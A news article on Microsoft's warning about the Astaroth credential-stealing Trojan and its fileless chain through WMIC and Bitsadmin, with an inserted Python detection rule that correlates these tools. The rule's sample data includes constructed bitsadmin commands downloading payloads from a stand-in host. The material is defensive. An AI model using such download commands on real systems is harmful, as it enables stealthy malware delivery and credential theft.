Microsoft Confirms Windows 'Great Duke Of Hell' Malware Attack

Researchers from the Microsoft Defender Advanced Threat Protection Research Team have issued a warning to confirm that a notorious credential-stealing malware threat is targeting Windows users. What makes this one so dangerous is that it uses an "invisible man" methodology by only running files within the attack chain that are legitimate system tools and so hides in plain sight.

The Astaroth Trojan can employ many techniques, including keylogging and clipboard monitoring, to steal login credentials. However, it is the way that it exploits living off the land binaries (LOLbins) that has created a certain level of infamy for the malware. In the case of the threat campaign that the newly published Microsoft report confirms, it was the Windows Management Instrumentation Command-line (WMIC) that was the LOLbin in question. Andrea Lelli, part of the Microsoft Defender ATP Research Team and author of the report, notes that the victim still has to click on a malicious link in an email to initiate the attack chain via a file that runs an obfuscated batch file. This batch file, in turn, runs the legitimate WMIC system tool in such a way that an obfuscated JavaScript file runs automatically.

Now, this is where things get necessarily complicated, involving more obfuscated JavaScript code and more legitimate system tools running. The most important tool in the attack chain is the Background Intelligent Transfer Service admin tool, Bitsadmin, which is used (in fact, multiple instances of Bitsadmin are used) to download additional payloads. These kinds of fileless attacks, as they are known, run the malicious payloads "directly in memory or leverage legitimate system tools to run malicious code without having to drop executable files on the disk," Lelli explained.
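To make the defender's side of this concrete, here is an added example, not code from Microsoft's report or from the campaign itself, of a small correlation rule run over process-creation events. It looks for the two signals the article describes, WMIC launched from a batch (cmd.exe) process and repeated Bitsadmin downloads on the same host, and only raises a high-severity finding when both appear together, because either tool on its own is everyday admin activity. The hostnames, PIDs, paths and command lines are constructed, and the Sysmon-style field names are an assumption about what the telemetry looks like.

```python
"""Correlate LOLbin process lineage over constructed process-creation events.

Field names mimic Sysmon Event ID 1 (Image, ParentImage, CommandLine) but are
an assumption; any EDR that records parent/child lineage would do.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    host: str
    pid: int
    image: str          # full path of the newly created process
    parent_image: str   # full path of its parent process
    cmdline: str


def basename(path: str) -> str:
    """Case-insensitive file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_bits_download(cmdline: str) -> bool:
    """bitsadmin used to fetch something: a /transfer job or an HTTP(S) URL."""
    c = cmdline.lower()
    return "/transfer" in c or "http://" in c or "https://" in c


def detect_lolbin_chain(events: List[ProcEvent], min_downloads: int = 2) -> List[Dict]:
    """Return one finding per host, sorted by host name.

    A host showing both WMIC spawned by cmd.exe and at least `min_downloads`
    bitsadmin downloads gets a single high-severity 'lolbin-chain' finding.
    Either signal alone is reported at low severity only, since administrators
    use both binaries legitimately.
    """
    wmic_hits: Dict[str, List[int]] = defaultdict(list)
    bits_hits: Dict[str, List[int]] = defaultdict(list)
    for e in events:
        img, parent = basename(e.image), basename(e.parent_image)
        if img == "wmic.exe" and parent == "cmd.exe":
            wmic_hits[e.host].append(e.pid)
        elif img == "bitsadmin.exe" and is_bits_download(e.cmdline):
            bits_hits[e.host].append(e.pid)

    findings: List[Dict] = []
    for host in sorted(set(wmic_hits) | set(bits_hits)):
        wmic_pids = wmic_hits.get(host, [])
        bits_pids = bits_hits.get(host, [])
        many_bits = len(bits_pids) >= min_downloads
        if wmic_pids and many_bits:
            findings.append({"host": host, "rule": "lolbin-chain", "severity": "high",
                             "pids": wmic_pids + bits_pids})
        elif wmic_pids:
            findings.append({"host": host, "rule": "wmic-from-cmd", "severity": "low",
                             "pids": wmic_pids})
        elif many_bits:
            findings.append({"host": host, "rule": "repeated-bits-downloads",
                             "severity": "low", "pids": bits_pids})
    return findings


# Constructed sample telemetry (hosts, PIDs, paths and URLs are all made up).
CMD = r"C:\Windows\System32\cmd.exe"
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
BITS = r"C:\Windows\System32\bitsadmin.exe"
SAMPLE_EVENTS = [
    # ws-01: the chain the article describes (batch -> WMIC, then repeated downloads)
    ProcEvent("ws-01", 4001, CMD, r"C:\Windows\explorer.exe",
              r'cmd.exe /c "C:\Users\alice\Downloads\invoice.bat"'),
    ProcEvent("ws-01", 4002, WMIC, CMD, "wmic.exe <obfuscated arguments omitted>"),
    ProcEvent("ws-01", 4003, BITS, CMD,
              r"bitsadmin /transfer j1 http://payload.example.invalid/1 C:\Users\alice\AppData\Local\Temp\p1"),
    ProcEvent("ws-01", 4004, BITS, CMD,
              r"bitsadmin /transfer j2 http://payload.example.invalid/2 C:\Users\alice\AppData\Local\Temp\p2"),
    ProcEvent("ws-01", 4005, BITS, CMD,
              r"bitsadmin /transfer j3 http://payload.example.invalid/3 C:\Users\alice\AppData\Local\Temp\p3"),
    # ws-02: benign use of the same binaries (hypothetical inventory agent, job listing)
    ProcEvent("ws-02", 5001, WMIC, r"C:\Program Files\InvAgent\agent.exe", "wmic os get caption"),
    ProcEvent("ws-02", 5002, BITS, CMD, "bitsadmin /list"),
    # ws-03: an administrator running WMIC at a command prompt, nothing else
    ProcEvent("ws-03", 6001, WMIC, CMD, "wmic cpu get name"),
]


if __name__ == "__main__":
    for f in detect_lolbin_chain(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['rule']} ({f['severity']}) pids={f['pids']}")
```

On the constructed data only ws-01 produces the high-severity finding; ws-03 is reported at low severity for the lineage alone and ws-02 not at all. In practice the cmd.exe-to-WMIC rule is noisy on its own, which is why the correlation, rather than either rule, is what makes the activity stand out as "unusual and anomalous".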

Eli Salem, a security researcher at Cybereason who uncovered another Astaroth attack earlier in the year, told me that these attacks are considered challenging to detect as "the full process of the deployment and execution of the malware" is by way of those Windows LOLBins. "To an average person, this activity can seem like a legitimate Windows activity," Salem says, "because it's being executed by Windows processes."

However, "using invisible techniques and being actually invisible are two different things," Lelli explained. Because some of the techniques used were so "unusual and anomalous," Microsoft Defender ATP, the commercial version of the Windows Defender Antivirus component that is included free of charge with Windows 10, was able to spot the Astaroth attack.

If you are not using Defender ATP, however, then Salem advises Windows users to be extra careful "when opening anonymous or new .lnk and .zip files that came from suspicious mail attachments." I also spoke to Kevin Reed, the CISO of Acronis, this afternoon, who says that as fileless malware is a very efficient technique, avoiding detection by many existing anti-malware products, users should choose a solution "that employs advanced malware detection techniques such as memory scanning, stack trace analysis, and system call-based detection as these will expose malware residing in PC memory only."

One thing is for sure, and that is I doubt it is the last we will hear of Astaroth and fileless malware. According to a recent WatchGuard threat intelligence report, "fileless threats appeared in both WatchGuard's top 10 malware and top 10 network attack lists. On the malware side, a PowerShell-based code injection attack showed up in the top 10 list for the first time, while the popular fileless backdoor tool, Meterpreter, made its first appearance in the top 10 list of network attacks too."

Corey Nachreiner, CTO of WatchGuard Technologies, said at the time that "it's clear that modern cybercriminals are leveraging a bevy of diverse attack methods," and I have yet to see anything to make me think he's wrong. As Sergeant Phil Esterhaus used to say in every episode of the cop drama Hill Street Blues back in the 1980s: "Hey, let's be careful out there."